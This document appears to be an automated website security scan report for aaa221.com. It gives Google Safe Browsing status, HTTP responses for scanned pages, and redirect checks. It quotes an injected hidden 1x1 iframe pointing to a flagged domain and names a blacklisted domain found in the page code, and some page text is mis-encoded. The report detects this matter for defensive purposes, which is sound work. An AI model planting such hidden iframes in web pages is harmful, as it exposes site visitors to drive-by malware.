Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aaa221.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aaa221.com/ | HTTP/1.1 302 Found Connection: Close Location: /?WebShieldDRSessionVerify=ztZqUIQ6uaBk864S7g3W Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://aaa221.com/?webshielddrsessionverify=ztzquiq6uabk864s7g3w | HTTP/1.1 302 Found Connection: Close Location: /?webshielddrsessionverify=ztzquiq6uabk864s7g3w&WebShieldDRSessionVerify=ztZqUIQ6uaBk864S7g3W Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://aaa221.com/?webshielddrsessionverify=ztzquiq6uabk864s7g3w&webshielddrsessionverify=ztzquiq6uabk864s7g3w | 200 OK Content-Length: 96810 Content-Type: text/html | malicious |
Page code contains blacklisted domain: www.16xb.com <HTML>
<HEAD> <TITLE>´ºÉ«ÌÃ--Ê×Ò³</TITLE> <meta name="description" content="¹ºÎïϵͳ,ASPÍøÉϹºÎïϵͳ,ÍøȤÍøÉϹºÎïϵͳ,ÍøȤ¹ºÎïϵͳ,ÍøÉϹºÎïϵͳ,ÍøÂ繺Îïϵͳ,ÍøȤ,ÍøÉÏÉ̵ê,ÍøÉÏ¿ªµêϵͳ,ÓòÃû×¢²á,ÐéÄâÖ÷»ú,ºãΰÍøÂç"> <meta name="keywords" content="¹ºÎïϵͳ,ASPÍøÉϹºÎïϵͳ,ÍøȤÍøÉϹºÎïϵͳ,ÍøȤ¹ºÎïϵͳ,ÍøÉϹºÎïϵͳ,ÍøÂ繺Îïϵͳ,ÍøȤ,ÍøÉÏÉ̵ê,ÍøÉÏ¿ªµêϵͳ,ÓòÃû×¢²á,ÐéÄâÖ÷»ú,ºãΰÍøÂç"> <LI ...[4513 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://www.51pkav.com/1.html This URL is marked by Google as suspicious <iframe src="http://www.51pkav.com/1.html" width=1 height=1> | ||
http://aaa221.com/Wq_StranJF.js | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 21:28:23 GMT Accept-Ranges: bytes ETag: "07f55165d33ce1:150e" Server: WWW Server/1.1 Content-Length: 8642 Content-Location: http://aaa221.com/Wq_StranJF.js Content-Type: application/x-javascript Last-Modified: Sun, 07 Apr 2013 06:56:54 GMT X-Powered-By: WAF/2.0 X-Safe-Firewall: websacan.360.cn 1.0.0.0 F1W1 | clean |
http://aaa221.com/wq_stranjf.js | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 21:28:24 GMT Accept-Ranges: bytes ETag: "07f55165d33ce1:150e" Server: WWW Server/1.1 Content-Length: 8642 Content-Location: http://aaa221.com/wq_stranjf.js Content-Type: application/x-javascript Last-Modified: Sun, 07 Apr 2013 06:56:54 GMT X-Powered-By: WAF/2.0 X-Safe-Firewall: websacan.360.cn 1.0.0.0 F1W1 | clean |
http://aaa221.com/test404page.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
http://s16.cnzz.com/stat.php?id=5146073&web_id=5146073&show=pic | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://webpresence.qq.com/getonline?Type=1&554758555: | 200 OK Content-Length: 12 Content-Type: text/html | clean |
http://code.54kefu.net/kefu/js/28/422028.js | 200 OK Content-Length: 510 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aaa221.com
Result:
HTTP/1.1 302 Found
Connection: Close
Location: /?WebShieldDRSessionVerify=ztZqUIQ6uaBk864S7g3W
Server: Safedog/4.0.0
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
GET / HTTP/1.1
Host: aaa221.com
Result:
HTTP/1.1 302 Found
Connection: Close
Location: /?WebShieldDRSessionVerify=ztZqUIQ6uaBk864S7g3W
Server: Safedog/4.0.0
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aaa221.com
Referer: http://www.google.com/search?q=aaa221.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aaa221.com
Referer: http://www.google.com/search?q=aaa221.com
Result:
The result is similar to the first query. There are no suspicious redirects found.